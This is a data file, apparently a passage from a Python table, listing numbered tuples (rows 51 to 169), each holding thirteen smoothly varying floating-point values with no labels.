(4.136143894204764, 4.140614814814815, 4.075125925925926, 4.8788027777777785, 4.4931828317244, 2.5, 3.11721917211329, 3.2668, 4.776596666666667, 2.961566913580247, 3.304540740740741, 3.8001679012345684, 4.05), # 51
(4.137759780898912, 4.125913031550069, 4.070734430727024, 4.874435082304527, 4.493981175181686, 2.5, 3.1069200839183413, 3.2444617283950614, 4.772214691358025, 2.951231239140375, 3.301641925427111, 3.7943125743026984, 4.05), # 52
(4.139277061326338, 4.1110993141289445, 4.0662902606310025, 4.869990843621399, 4.4947301726330116, 2.5, 3.0965505043169532, 3.222241975308642, 4.767770493827161, 2.9408617649748514, 3.2986790622272104, 3.7883870141746687, 4.05), # 53
(4.140695417156286, 4.0962000000000005, 4.0618, 4.865475, 4.495429750658201, 2.5, 3.086129411764706, 3.2001999999999997, 4.76327, 2.93048, 3.295654545454545, 3.7824, 4.05), # 54
(4.142014530058009, 4.081241426611797, 4.057270233196159, 4.860892489711934, 4.496079835837076, 2.5, 3.075675784717179, 3.178395061728395, 4.758719135802469, 2.920107453132145, 3.292570769422621, 3.7763603109282124, 4.05), # 55
(4.143234081700749, 4.066249931412894, 4.052707544581619, 4.8562482510288065, 4.496680354749464, 2.5, 3.0652086016299527, 3.1568864197530866, 4.754123827160494, 2.909765633287609, 3.2894301284449434, 3.770276726108825, 4.05), # 56
(4.144353753753753, 4.051251851851852, 4.048118518518519, 4.851547222222223, 4.497231233975187, 2.5, 3.0547468409586056, 3.135733333333334, 4.749490000000001, 2.8994760493827165, 3.286235016835017, 3.764158024691358, 4.05), # 57
(4.145373227886272, 4.036273525377229, 4.043509739368999, 4.846794341563786, 4.49773240009407, 2.5, 3.044309481158719, 3.1149950617283952, 4.744823580246914, 2.889260210333791, 3.2829878289063483, 3.7580129858253315, 4.05), # 58
(4.146292185767549, 4.0213412894375855, 4.038887791495199, 4.841994547325103, 4.498183779685938, 2.5, 3.0339155006858713, 3.094730864197531, 4.740130493827161, 2.8791396250571566, 3.27969095897244, 3.7518503886602654, 4.05), # 59
(4.147110309066831, 4.006481481481482, 4.034259259259259, 4.837152777777778, 4.498585299330615, 2.5, 3.0235838779956428, 3.075, 4.7354166666666675, 2.869135802469136, 3.2763468013468016, 3.745679012345679, 4.05), # 60
(4.147827279453366, 3.9917204389574765, 4.02963072702332, 4.832273971193416, 4.498936885607924, 2.5, 3.0133335915436135, 3.0558617283950618, 4.730688024691358, 2.859270251486054, 3.2729577503429357, 3.7395076360310933, 4.05), # 61
(4.148442778596402, 3.977084499314129, 4.025008779149521, 4.827363065843622, 4.499238465097694, 2.5, 3.0031836197853625, 3.0373753086419755, 4.725950493827161, 2.8495644810242347, 3.2695262002743486, 3.7333450388660268, 4.05), # 62
(4.148956488165184, 3.9626, 4.0204, 4.822425000000001, 4.499489964379743, 2.5, 2.9931529411764703, 3.0196000000000005, 4.72121, 2.84004, 3.266054545454546, 3.7272, 4.05), # 63
(4.149368089828959, 3.948293278463649, 4.0158109739369, 4.817464711934157, 4.499691310033899, 2.5, 2.983260534172517, 3.0025950617283956, 4.716472469135803, 2.8307183173296755, 3.2625451801970318, 3.7210812985825337, 4.05), # 64
(4.149677265256975, 3.934190672153635, 4.01124828532236, 4.812487139917696, 4.499842428639987, 2.5, 2.9735253772290813, 2.9864197530864196, 4.711743827160494, 2.821620941929584, 3.2590004988153143, 3.7149977137631454, 4.05), # 65
(4.149883696118478, 3.920318518518519, 4.006718518518519, 4.8074972222222225, 4.499943246777829, 2.5, 2.963966448801743, 2.971133333333334, 4.7070300000000005, 2.8127693827160494, 3.2554228956228957, 3.7089580246913587, 4.05), # 66
(4.149987064082717, 3.9067031550068587, 4.002228257887517, 4.8024998971193416, 4.499993691027252, 2.5, 2.9546027273460824, 2.956795061728396, 4.702336913580247, 2.804185148605396, 3.2518147649332843, 3.7029710105166895, 4.05), # 67
(4.14991664579233, 3.8932994557281293, 3.9977623799725652, 4.797456696188943, 4.499951182118938, 2.49995360463344, 2.9454060779318585, 2.943337540009145, 4.6976351394604485, 2.7958481766588665, 3.2481143954161507, 3.697012008759897, 4.0499500600137175), # 68
(4.149256682769726, 3.879698207885305, 3.99319537037037, 4.792113405797101, 4.499564270152505, 2.4995868312757206, 2.9361072725386457, 2.9300395061728395, 4.692719135802469, 2.787522556281772, 3.243945135566188, 3.69088758934373, 4.049554398148149), # 69
(4.147954315023558, 3.865836983937342, 3.9885073731138543, 4.7864348497047775, 4.498799725651577, 2.4988645023624447, 2.926664053824548, 2.916780978509374, 4.687561156835849, 2.779167809785094, 3.239259554610432, 3.6845691045171236, 4.048772933813444), # 70
(4.146027864257172, 3.851724067436612, 3.9837000342935527, 4.7804294015029525, 4.497667231501654, 2.497798323426307, 2.9170806638155953, 2.9035663465935073, 4.6821688843164155, 2.770784143737056, 3.2340749483135447, 3.678061174885086, 4.047615955075446), # 71
(4.143495652173914, 3.8373677419354837, 3.9787749999999997, 4.774105434782609, 4.496176470588235, 2.4964000000000004, 2.907361344537815, 2.8904, 4.676550000000001, 2.7623717647058825, 3.228408612440192, 3.671368421052632, 4.04609375), # 72
(4.140376000477128, 3.8227762909863268, 3.973733916323731, 4.767471323134729, 4.494337125796821, 2.494681237616217, 2.897510338017237, 2.8772863283036125, 4.670712185642433, 2.7539308792597974, 3.2222778427550356, 3.6644954636247675, 4.04421660665295), # 73
(4.136687230870161, 3.807957998141511, 3.968578429355281, 4.760535440150295, 4.49215888001291, 2.4926537418076515, 2.887531886279889, 2.864229721079104, 4.664663122999543, 2.745461693967025, 3.2156999350227427, 3.657446923206507, 4.041994813100138), # 74
(4.13244766505636, 3.7929211469534048, 3.963310185185185, 4.75330615942029, 4.489651416122005, 2.4903292181069965, 2.8774302313518003, 2.8512345679012348, 4.65841049382716, 2.736964415395788, 3.2086921850079744, 3.650227420402859, 4.039438657407408), # 75
(4.127675624739071, 3.77767402097438, 3.957930829903978, 4.745791854535695, 4.486824417009602, 2.4877193720469446, 2.8672096152589983, 2.8383052583447648, 4.651961979881116, 2.7284392501143118, 3.2012718884753966, 3.6428415758188333, 4.036558427640603), # 76
(4.122389431621637, 3.7622249037568043, 3.952442009602194, 4.738000899087493, 4.483687565561204, 2.4848359091601893, 2.8568742800275118, 2.825446181984454, 4.645325262917239, 2.71988640469082, 3.193456341189675, 3.6352940100594426, 4.03336441186557), # 77
(4.1166074074074075, 3.7465820788530473, 3.9468453703703705, 4.729941666666667, 4.48025054466231, 2.481690534979424, 2.84642846768337, 2.812661728395062, 4.638508024691357, 2.7113060856935367, 3.1852628389154707, 3.6275893437296953, 4.029866898148149), # 78
(4.110347873799726, 3.730753829815479, 3.94114255829904, 4.721622530864198, 4.476523037198419, 2.4782949550373417, 2.8358764202526006, 2.7999562871513493, 4.631517946959305, 2.7026984996906855, 3.176708677417449, 3.619732197434602, 4.026076174554183), # 79
(4.103629152501939, 3.714748440196469, 3.9353352194787377, 4.713051865271068, 4.4725147260550315, 2.474660874866636, 2.8252223797612324, 2.7873342478280754, 4.624362711476909, 2.6940638532504906, 3.1678111524602754, 3.611727191779174, 4.02200252914952), # 80
(4.096469565217392, 3.6985741935483873, 3.929425, 4.704238043478262, 4.468235294117647, 2.4708, 2.8144705882352943, 2.7748000000000004, 4.61705, 2.6854023529411766, 3.1585875598086126, 3.603578947368421, 4.01765625), # 81
(4.088887433649431, 3.682239373423603, 3.9234135459533612, 4.695189439076758, 4.463694424271766, 2.466724035970127, 2.8036252877008145, 2.762357933241884, 4.6095874942844075, 2.6767142053309665, 3.1490551952271253, 3.5952920848073546, 4.013047625171469), # 82
(4.080901079501402, 3.6657522633744857, 3.9173025034293554, 4.685914425657542, 4.458901799402889, 2.4624446883097093, 2.7926907201838214, 2.7500124371284866, 4.6019828760859625, 2.6679996169880846, 3.1392313544804775, 3.586871224700985, 4.008186942729767), # 83
(4.072528824476651, 3.649121146953405, 3.9110935185185185, 4.676421376811595, 4.453867102396514, 2.4579736625514403, 2.7816711277103434, 2.7377679012345677, 4.5942438271604935, 2.6592587944807557, 3.1291333333333333, 3.578320987654321, 4.003084490740741), # 84
(4.063788990278524, 3.6323543077127307, 3.904788237311385, 4.666718666129898, 4.448600016138143, 2.4533226642280144, 2.77057075230641, 2.7256287151348886, 4.586378029263831, 2.6504919443772024, 3.1187784275503576, 3.569645994272375, 3.9977505572702334), # 85
(4.054699898610365, 3.6154600292048324, 3.8983883058984916, 4.656814667203436, 4.443110223513274, 2.4485033988721234, 2.7593938359980483, 2.7135992684042067, 4.578393164151807, 2.6416992732456497, 3.108183932896214, 3.5608508651601576, 3.992195430384088), # 86
(4.045279871175523, 3.5984465949820788, 3.8918953703703703, 4.6467177536231885, 4.437407407407409, 2.443527572016461, 2.7481446208112876, 2.701683950617284, 4.570296913580248, 2.632880987654321, 3.097367145135566, 3.551940220922677, 3.9864293981481485), # 87
(4.035547229677343, 3.5813222885968403, 3.8853110768175583, 4.63643629898014, 4.431501250706044, 2.4384068891937205, 2.7368273487721564, 2.68988715134888, 4.562096959304984, 2.6240372941714405, 3.0863453600330795, 3.542918682164946, 3.9804627486282587), # 88
(4.025520295819169, 3.564095393601487, 3.87863707133059, 4.625978676865271, 4.425401436294683, 2.4331530559365953, 2.7254462619066833, 2.678213260173754, 4.553800983081848, 2.615168399365233, 3.0751358733534175, 3.533790869491974, 3.9743057698902606), # 89
(4.015217391304348, 3.546774193548387, 3.871875, 4.615353260869566, 4.419117647058824, 2.427777777777778, 2.7140056022408965, 2.6666666666666665, 4.545416666666667, 2.6062745098039217, 3.0637559808612442, 3.524561403508772, 3.9679687500000003), # 90
(4.004656837836225, 3.529366971989911, 3.8650265089163236, 4.604568424584005, 4.412659565883966, 2.4222927602499618, 2.7025096118008247, 2.6552517604023778, 4.536951691815273, 2.5973558320557304, 3.052222978321224, 3.5152349048203497, 3.961461977023319), # 91
(3.9938569571181493, 3.511882012478429, 3.858093244170096, 4.593632541599571, 4.406036875655611, 2.4167097088858407, 2.690962532612497, 2.6439729309556474, 4.528413740283494, 2.588412572688884, 3.0405541614980214, 3.5058159940317193, 3.954795739026063), # 92
(3.982836070853462, 3.4943275985663087, 3.851076851851852, 4.582553985507247, 4.399259259259259, 2.411040329218107, 2.6793686067019404, 2.632834567901235, 4.519810493827161, 2.579444938271605, 3.0287668261563, 3.496309291747888, 3.9479803240740736), # 93
(3.971612500745512, 3.476712013805921, 3.8439789780521267, 4.571341129898014, 4.392336399580408, 2.4052963267794545, 2.6677320760951844, 2.621841060813901, 4.511149634202104, 2.570453135372119, 3.016878268060724, 3.4867194185738697, 3.9410260202331964), # 94
(3.960204568497644, 3.4590435417496352, 3.8368012688614543, 4.560002348362856, 4.3852779795045596, 2.399489407102576, 2.6560571828182575, 2.6109967992684044, 4.502438843164152, 2.5614373705586484, 3.0049057829759587, 3.477050995114672, 3.933943115569273), # 95
(3.948630595813205, 3.4413304659498216, 3.829545370370371, 4.548546014492754, 4.378093681917211, 2.3936312757201645, 2.6443481688971886, 2.6003061728395065, 4.493685802469136, 2.5523978503994194, 2.992866666666667, 3.4673086419753094, 3.9267418981481486), # 96
(3.936908904395539, 3.4235810699588485, 3.82221292866941, 4.53698050187869, 4.370793189703866, 2.3877336381649137, 2.6326092763580053, 2.5897735711019667, 4.484898193872886, 2.543334781462654, 2.980778214897513, 3.457496979760788, 3.919432656035666), # 97
(3.925057815947994, 3.4058036373290856, 3.814805589849108, 4.525314184111648, 4.363386185750021, 2.3818081999695173, 2.6208447472267373, 2.5794033836305443, 4.476083699131229, 2.534248370316577, 2.9686577234331626, 3.4476206290761193, 3.9120256772976685), # 98
(3.9130956521739133, 3.3880064516129034, 3.8073250000000005, 4.513555434782609, 4.355882352941177, 2.3758666666666666, 2.6090588235294123, 2.5692000000000004, 4.46725, 2.525138823529412, 2.956522488038278, 3.437684210526316, 3.9045312500000002), # 99
(3.901040734776645, 3.3701977963626706, 3.79977280521262, 4.501712627482555, 4.348291374162834, 2.3699207437890566, 2.597255747292058, 2.559167809785094, 4.458404778235026, 2.5160063476693835, 2.944389804477524, 3.427692344716387, 3.896959662208505), # 100
(3.888911385459534, 3.3523859551307584, 3.792150651577504, 4.4897941358024696, 4.340622932300493, 2.3639821368693794, 2.585439760540705, 2.549311202560585, 4.449555715592136, 2.5068511493047154, 2.932276968515565, 3.4176496522513413, 3.8893212019890258), # 101
(3.8767259259259266, 3.3345792114695345, 3.784460185185185, 4.477808333333334, 4.332886710239651, 2.3580625514403297, 2.5736151053013803, 2.539634567901235, 4.440710493827161, 2.4976734350036316, 2.9202012759170657, 3.4075607537361927, 3.881626157407408), # 102
(3.864502677879168, 3.316785848931369, 3.7767030521262, 4.46576359366613, 4.325092390865811, 2.3521736930345987, 2.561786023600112, 2.530142295381802, 4.43187679469593, 2.488473411334356, 2.9081800224466896, 3.397430269775949, 3.873884816529492), # 103
(3.852259963022604, 3.2990141510686315, 3.7688808984910835, 4.453668290391842, 4.317249657064472, 2.3463272671848805, 2.5499567574629305, 2.5208387745770464, 4.4230622999542755, 2.4792512848651125, 2.8962305038691003, 3.3872628209756215, 3.8661074674211253), # 104
(3.840016103059581, 3.2812724014336916, 3.7609953703703702, 4.441530797101449, 4.309368191721133, 2.3405349794238686, 2.5381315489158633, 2.511728395061729, 4.414274691358025, 2.4700072621641254, 2.8843700159489636, 3.3770630279402214, 3.858304398148148), # 105
(3.8277894196934454, 3.2635688835789196, 3.7530481138545952, 4.429359487385937, 4.301457677721294, 2.3348085352842554, 2.526314639984938, 2.5028155464106083, 4.405521650663008, 2.460741549799618, 2.872615854450942, 3.3668355112747577, 3.850485896776406), # 106
(3.8155982346275423, 3.2459118810566845, 3.745040775034294, 4.417162734836285, 4.293527797950456, 2.329159640298735, 2.5145102726961848, 2.494104618198446, 4.396810859625058, 2.4514543543398157, 2.860985315139701, 3.356584891584242, 3.842662251371742), # 107
(3.8034608695652175, 3.2283096774193556, 3.7369750000000006, 4.404948913043479, 4.285588235294117, 2.3236000000000003, 2.5027226890756302, 2.4856000000000003, 4.38815, 2.4421458823529414, 2.8494956937799043, 3.346315789473685, 3.8348437500000006), # 108
(3.7913956462098173, 3.210770556219302, 3.72885243484225, 4.392726395598497, 4.27764867263778, 2.318141319920744, 2.490956131149305, 2.4773060813900325, 4.379546753543667, 2.432816340407219, 2.838164286136216, 3.336032825548095, 3.8270406807270234), # 109
(3.7794208862646865, 3.193302801008895, 3.7206747256515786, 4.380503556092324, 4.269718792866942, 2.3127953055936596, 2.4792148409432357, 2.4692272519433014, 4.371008802011889, 2.4234659350708734, 2.8270083879733003, 3.3257406204124855, 3.819263331618656), # 110
(3.7675549114331726, 3.175914695340502, 3.712443518518519, 4.368288768115942, 4.261808278867103, 2.3075736625514405, 2.4675030604834527, 2.461367901234568, 4.362543827160494, 2.414094872912128, 2.8160452950558215, 3.3154437946718653, 3.811521990740741), # 111
(3.75581604341862, 3.1586145227664937, 3.7041604595336084, 4.356090405260333, 4.253926813523764, 2.3024880963267798, 2.4558250317959835, 2.453732418838592, 4.354159510745313, 2.4047033604992065, 2.805292303148444, 3.3051469689312443, 3.803826946159122), # 112
(3.744201689481218, 3.141439447514381, 3.6958471313008276, 4.343933552996816, 4.246070272069482, 2.2975479076858054, 2.444210385462708, 2.4463410275122426, 4.345885124503448, 2.395321894645092, 2.7947695624611466, 3.2948771746017713, 3.7961775603372887), # 113
(3.732592359160026, 3.1245588734102143, 3.6876182700086475, 4.331915768510934, 4.238157341826531, 2.2927418434119606, 2.432807283364232, 2.439284503802048, 4.3378476142852245, 2.386126067165113, 2.784497734845279, 3.28476486884519, 3.788510165664014), # 114
(3.720953961201598, 3.107978879473219, 3.679478773082927, 4.320033802072712, 4.230163071155441, 2.2880574049995057, 2.421623860076625, 2.4325610617114837, 4.330049991467516, 2.377130131195231, 2.7744618045708376, 3.2748150330235406, 3.7808026526641507), # 115
(3.709271949295054, 3.091675312516681, 3.6714128759935494, 4.3082664601065614, 4.222075410553511, 2.283483550914839, 2.4106419270111576, 2.4261521251595974, 4.322472535691133, 2.368317343379819, 2.7646423725085927, 3.2650092789949383, 3.7730429039023563), # 116
(3.697531777129509, 3.0756240193538886, 3.6634048142103945, 4.296592549036897, 4.213882310518044, 2.279009239624356, 2.399843295579101, 2.420039118065434, 4.315095526596881, 2.3596709603632515, 2.755020039529313, 3.2553292186175002, 3.76521880194329), # 117
(3.6857188983940845, 3.0598008467981295, 3.655438823203347, 4.284990875288133, 4.205571721546337, 2.2746234295944556, 2.3892097771917262, 2.414203464348039, 4.307899243825574, 2.3511742387899037, 2.74557540650377, 3.24575646374934, 3.75731822935161), # 118
(3.673818766777897, 3.044181641662692, 3.6474991384422895, 4.273440245284682, 4.197131594135689, 2.270315079291533, 2.3787231832603024, 2.408626587926458, 4.300863967018017, 2.342810435304149, 2.7362890743027313, 3.236272626248574, 3.749329068691973), # 119
(3.6618168359700647, 3.0287422507608635, 3.639569995397105, 4.261919465450958, 4.188549878783399, 2.266073147181986, 2.3683653251961014, 2.403289912719737, 4.293969975815023, 2.334562806550362, 2.7271416437969664, 3.226859317973319, 3.741239202529039), # 120
(3.6496985596597074, 3.0134585209059317, 3.631635629537675, 4.250407342211374, 4.179814525986767, 2.261886591732212, 2.358118014410392, 2.398174862646923, 4.2871975498573995, 2.3264146091729185, 2.7181137158572466, 3.217498150781689, 3.7330365134274643), # 121
(3.6374493915359416, 2.9983062989111846, 3.6236802763338845, 4.238882681990343, 4.170913486243093, 2.2577443714086076, 2.347963062314447, 2.3932628616270595, 4.2805269687859555, 2.318349099816191, 2.7091858913543407, 3.2081707365318004, 3.7247088839519082), # 122
(3.6250547852878876, 2.9832614315899098, 3.6156881712556146, 4.227324291212278, 4.161834710049677, 2.25363544467757, 2.3378822803195356, 2.3885353335791932, 4.273938512241502, 2.310349535124555, 2.700338771159018, 3.198858687081769, 3.716244196667029), # 123
(3.612500194604662, 2.968299765755395, 3.607643549772748, 4.215710976301595, 4.152566147903815, 2.2495487700054957, 2.327857479836928, 2.3839737024223706, 4.267412459864846, 2.3023991717423846, 2.691552956142048, 3.1895436142897102, 3.7076303341374848), # 124
(3.5997710731753836, 2.9533971482209282, 3.5995306473551696, 4.204021543682704, 4.143095750302809, 2.2454733058587824, 2.3178704722778956, 2.3795593920756364, 4.260929091296798, 2.2944812663140537, 2.6828090471742008, 3.1802071300137396, 3.6988551789279316), # 125
(3.5868528746891712, 2.938529425799798, 3.5913336994727594, 4.192234799780022, 4.133411467743957, 2.241398010703827, 2.307903069053708, 2.375273826458037, 4.254468686178167, 2.286579075483937, 2.6740876451262454, 3.170830846111974, 3.6899066136030316), # 126
(3.5737310528351447, 2.92367244530529, 3.583036941595402, 4.18032955101796, 4.123501250724559, 2.237311843007026, 2.2979370815756375, 2.3710984294886184, 4.248011524149763, 2.2786758558964095, 2.6653693508689518, 3.1613963744425266, 3.6807725207274395), # 127
(3.5603910613024183, 2.908802053550694, 3.57462460919298, 4.168284603820933, 4.113353049741916, 2.2332037612347775, 2.287954321254953, 2.367014625086425, 4.241537884852394, 2.2707548641958453, 2.6566347652730897, 3.1518853268635154, 3.671440782865815), # 128
(3.546818353780113, 2.8938940973492966, 3.566080937735376, 4.156078764613353, 4.102954815293325, 2.229062723853478, 2.2779365995029255, 2.363003837170504, 4.23502804792687, 2.2627993570266183, 2.6478644892094287, 3.1422793152330546, 3.6618992825828154), # 129
(3.532998383957347, 2.8789244235143867, 3.5573901626924718, 4.143690839819635, 4.092294497876085, 2.2248776893295235, 2.267865727730825, 2.3590474896599, 4.228462293014, 2.254792591033103, 2.639039123548738, 3.1325599514092612, 3.6521359024430993), # 130
(3.5189166055232377, 2.863868878859251, 3.5485365195341525, 4.1310996358641905, 4.081360047987498, 2.2206376161293124, 2.2577235173499237, 2.35512700647366, 4.2218208997545945, 2.246717822859674, 2.6301392691617873, 3.1227088472502498, 3.6421385250113247), # 131
(3.504558472166904, 2.8487033101971777, 3.5395042437302986, 4.118283959171435, 4.070139416124862, 2.216331462719241, 2.24749177977149, 2.3512238115308293, 4.215084147789462, 2.2385583091507057, 2.6211455269193458, 3.112707614614137, 3.6318950328521504), # 132
(3.4899094375774653, 2.833403564341454, 3.5302775707507936, 4.105222616165781, 4.058620552785475, 2.2119481875657065, 2.237152326406796, 2.347319328750453, 4.2082323167594105, 2.230297306550573, 2.6120384976921844, 3.102537865359037, 3.6213933085302346), # 133
(3.474954955444038, 2.8179454881053694, 3.5208407360655216, 4.091894413271642, 4.046791408466637, 2.207476749135106, 2.2266869686671114, 2.3433949820515774, 4.201245686305252, 2.2219180717036493, 2.6027987823510714, 3.0921812113430667, 3.6106212346102335), # 134
(3.4596804794557414, 2.8023049283022097, 3.5111779751443635, 4.078278156913432, 4.034639933665648, 2.202906105893837, 2.2160775179637073, 2.339432195353248, 4.194104536067792, 2.2134038612543105, 2.593406981766777, 3.081619264424341, 3.599566693656808), # 135
(3.444071463301694, 2.786457731745264, 3.5012735234572037, 4.064352653515562, 4.022154078879807, 2.198225216308296, 2.205305785707854, 2.335412392574511, 4.186789145687842, 2.204737931846929, 2.583843696810071, 3.0708336364609767, 3.5882175682346147), # 136
(3.4281133606710137, 2.770379745247819, 3.4911116164739244, 4.0500967095024505, 4.0093217946064135, 2.1934230388448794, 2.1943535833108223, 2.3313169976344117, 4.179279794806213, 2.195903540125881, 2.5740895283517222, 3.059805939311088, 3.5765617409083106), # 137
(3.4117916252528193, 2.7540468156231634, 3.480676489664407, 4.0354891312985055, 3.9961310313427676, 2.1884885319699854, 2.1832027221838817, 2.327127434451996, 4.1715567630637125, 2.186883942735539, 2.564125077262501, 3.048517784832791, 3.5645870942425564), # 138
(3.3950917107362275, 2.7374347896845848, 3.469952378498536, 4.020508725328144, 3.9825697395861663, 2.1834106541500105, 2.171835013738304, 2.32282512694631, 4.163600330101149, 2.177662396320279, 2.5539309444131764, 3.0369507848842026, 3.5522815108020076), # 139
(3.3779990708103593, 2.72051951424537, 3.458923518446195, 4.005134298015778, 3.968625869833912, 2.1781783638513517, 2.1602322693853586, 2.3183914990363985, 4.155390775559333, 2.1682221575244744, 2.5434877306745176, 3.0250865513234366, 3.539632873151326), # 140
(3.3604991591643323, 2.7032768361188086, 3.4475741449772643, 3.989344655785821, 3.9542873725833014, 2.172780619540406, 2.148376300536318, 2.3138079746413083, 4.146908379079072, 2.1585464829925005, 2.5327760369172956, 3.01290669600861, 3.5266290638551654), # 141
(3.3425774294872626, 2.6856826021181863, 3.4358884935616283, 3.9731186050626883, 3.939542198331635, 2.167206379683571, 2.1362489186024507, 2.3090559776800847, 4.138133420301177, 2.1486186293687313, 2.521776464012279, 3.000392830797838, 3.5132579654781866), # 142
(3.32421933546827, 2.6677126590567926, 3.4238507996691703, 3.95643495227079, 3.9243782975762116, 2.1614446027472427, 2.1238319349950276, 2.3041169320717727, 4.129046178866459, 2.138421853297541, 2.5104696128302373, 2.987526567549236, 3.499507460585047), # 143
(3.305410330796474, 2.6493428537479145, 3.411445298769771, 3.939272503834543, 3.9087836208143316, 2.1554842471978186, 2.1111071611253194, 2.2989722617354196, 4.119626934415724, 2.127939411423304, 2.4988360842419404, 2.9742895181209197, 3.485365431740406), # 144
(3.286135869160991, 2.63054903300484, 3.3986562263333155, 3.921610066178358, 3.892746118543293, 2.149314271501696, 2.0980564084045974, 2.2936033905900706, 4.109855966589782, 2.117154560390395, 2.486856479118158, 2.9606632943710056, 3.47081976150892), # 145
(3.2663814042509403, 2.6113070436408568, 3.385467817829687, 3.9034264457266503, 3.8762537412603972, 2.1429236341252724, 2.084661488244132, 2.287991742554771, 4.099713555029442, 2.106050556843188, 2.4745113983296596, 2.946629508157608, 3.4558583324552474), # 146
(3.24613238975544, 2.5915927324692523, 3.371864308728764, 3.884700448903832, 3.859294439462941, 2.136301293534943, 2.0709042120551926, 2.282118741548566, 4.089179979375516, 2.0946106574260583, 2.4617814427472147, 2.9321697713388444, 3.4404690271440472), # 147
(3.2253742793636087, 2.5713819463033154, 3.357829934500433, 3.8654108821343187, 3.8418561636482247, 2.129436208197107, 2.0567663912490506, 2.275965811490503, 4.078235519268811, 2.0828181187833787, 2.448647213241593, 2.9172656957728282, 3.4246397281399767), # 148
(3.204092526764565, 2.5506505319563324, 3.3433489306145776, 3.845536551842521, 3.8239268643135484, 2.12231733657816, 2.0422298372369765, 2.2695143762996266, 4.066860454350135, 2.0706561975595252, 2.435089310683564, 2.901898893317677, 3.408358318007695), # 149
(3.182272585647426, 2.5293743362415917, 3.328405532541078, 3.825056264452855, 3.8054944919562104, 2.1149336371444996, 2.0272763614302405, 2.2627458598949826, 4.055035064260301, 2.0581081503988705, 2.4210883359438973, 2.8860509758315054, 3.3916126793118586), # 150
(3.15989990970131, 2.5075292059723817, 3.312983975749817, 3.803948826389732, 3.786546997073511, 2.107274068362522, 2.011887775240113, 2.2556416861956174, 4.042739628640116, 2.0451572339457913, 2.406624889893362, 2.869703555172429, 3.3743906946171274), # 151
(3.1369599526153373, 2.485090987961989, 3.297068495710681, 3.7821930440775677, 3.7670723301627476, 2.0993275886986256, 1.996045890077866, 2.2481832791205765, 4.029954427130388, 2.03178670484466, 2.3916795734027287, 2.8528382431985637, 3.356680246488159), # 152
(3.1134381680786243, 2.462035529023703, 3.2806433278935474, 3.759767723940773, 3.7470584417212223, 2.0910831566192063, 1.9797325173547677, 2.240352062588905, 4.01665973937193, 2.0179798197398515, 2.3762329873427666, 2.835436651768026, 3.338469217489611), # 153
(3.0893200097802915, 2.43833867597081, 3.2636927077683033, 3.736651672403764, 3.726493282246232, 2.082529730590662, 1.9629294684820913, 2.232129460519649, 4.002835845005547, 2.0037198352757413, 2.360265732584245, 2.81748039273893, 3.319745490186143), # 154
(3.0645909314094544, 2.413976275616598, 3.2462008708048304, 3.7128236958909513, 3.7053648022350787, 2.0736562690793887, 1.9456185548711045, 2.2234968968318545, 3.9884630236720513, 1.9889900080967018, 2.343758409997933, 2.798951077969393, 3.3004969471424106), # 155
(3.0392363866552325, 2.3889241747743553, 3.2281520524730105, 3.68826260082675, 3.6836609521850594, 2.0644517305517844, 1.92778158793308, 2.2144357954445675, 3.9735215550122507, 1.9737735948471091, 2.3266916204546018, 2.7798303193175293, 3.280711470923074), # 156
(3.013241829206745, 2.3631582202573695, 3.209530488242727, 3.662947193635575, 3.661369682593474, 2.0549050734742456, 1.9094003790792877, 2.204927580276833, 3.9579917186669555, 1.9580538521713367, 2.3090459648250197, 2.760099728641455, 3.2603769440927906), # 157
(2.985872378562096, 2.3361812483089035, 3.1894367815609423, 3.6359078326604974, 3.637472442348399, 2.044409790526844, 1.890042688371143, 2.194318780939749, 3.9406648366396393, 1.9413463665164574, 2.290238301015577, 2.739039825677736, 3.238594343766138), # 158
(2.9529147067913613, 2.305226127839791, 3.162695127361195, 3.6015908635153817, 3.6060765239126513, 2.0294758592028415, 1.8672851053542865, 2.178885413105753, 3.914570904488858, 1.9209123976394982, 2.2669667742475976, 2.7125450094732435, 3.210171058768078), # 159
(2.913948837961724, 2.2700386914162856, 3.1287683831823556, 3.559431004163544, 3.5665680525387184, 2.0097365184190736, 1.8408974993535137, 2.158239675810939, 3.8789700908914604, 1.8964822607451575, 2.238903803443816, 2.680200779555139, 3.1745682435574323), # 160
(2.869288821834384, 2.2308483472321874, 3.0880187887641237, 3.509829001502691, 3.5193572497128454, 1.9854308966281256, 1.8110725784027506, 2.132640213243912, 3.834331906799607, 1.8682632772683752, 2.206296661839883, 2.6423069875630283, 3.132149617927639), # 161
(2.8192487081705426, 2.1878845034812957, 3.0408085838461982, 3.4531856024305307, 3.464854336921282, 1.9567981222825823, 1.7780030505359237, 2.102345669593281, 3.781125863165455, 1.8364627686440926, 2.1693926226714484, 2.5991634851365175, 3.0832789016721334), # 162
(2.7641425467313994, 2.1413765683574097, 2.987500008168281, 3.3899015538447737, 3.4034695356502755, 1.924077323835029, 1.7418816237869603, 2.06761468904765, 3.7198214709411626, 1.80128805630725, 2.1284389591741633, 2.5510701239152134, 3.0283198145843517), # 163
(2.704284387278154, 2.0915539500543283, 2.9284553014700707, 3.320377602643127, 3.3356130673860758, 1.8875076297380518, 1.7029010061897865, 2.0287059157956278, 3.6508882410788894, 1.7629464616927875, 2.0836829445836784, 2.4983267555387214, 2.9676360764577314), # 164
(2.639988279572007, 2.038646056765853, 2.8640367034912675, 3.245014495723301, 3.2616951536149297, 1.8473281684442346, 1.6612539057783289, 1.9858779940258184, 3.574795684530792, 1.7216453062356454, 2.0353718521356448, 2.441233231646648, 2.901591407085708), # 165
(2.571568273374159, 1.9828822966857818, 2.7946064539715714, 3.1642129799830006, 3.1821260158230857, 1.8037780684061635, 1.6171330305865146, 1.939389567926831, 3.4920133122490293, 1.677591911370765, 1.9837529550657118, 2.3800894038786007, 2.830549526261718), # 166
(2.4993384184458094, 1.9244920780079149, 2.720526792650682, 3.0783738023199376, 3.097315875496792, 1.7570964580764235, 1.57073108864827, 1.8894992816872707, 3.40301063518576, 1.6309935985330857, 1.929073526609531, 2.3151951238741835, 2.7548741537791983), # 167
(2.4236127645481584, 1.8637048089260515, 2.6421599592682994, 2.9878977096318184, 3.007674954122297, 1.7075224659075996, 1.5222407879975217, 1.836465779495744, 3.308257164293142, 1.5820576891575489, 1.8715808400027525, 2.2468502432730046, 2.674929009431585), # 168
(2.344705361442406, 1.8007498976339917, 2.5598681935641237, 2.8931854488163533, 2.913613473185848, 1.655295220352278, 1.4718548366681967, 1.780547705540858, 3.2082224105233355, 1.5309915046790947, 1.8115221684810274, 2.175354613714669, 2.591077813012314), # 169
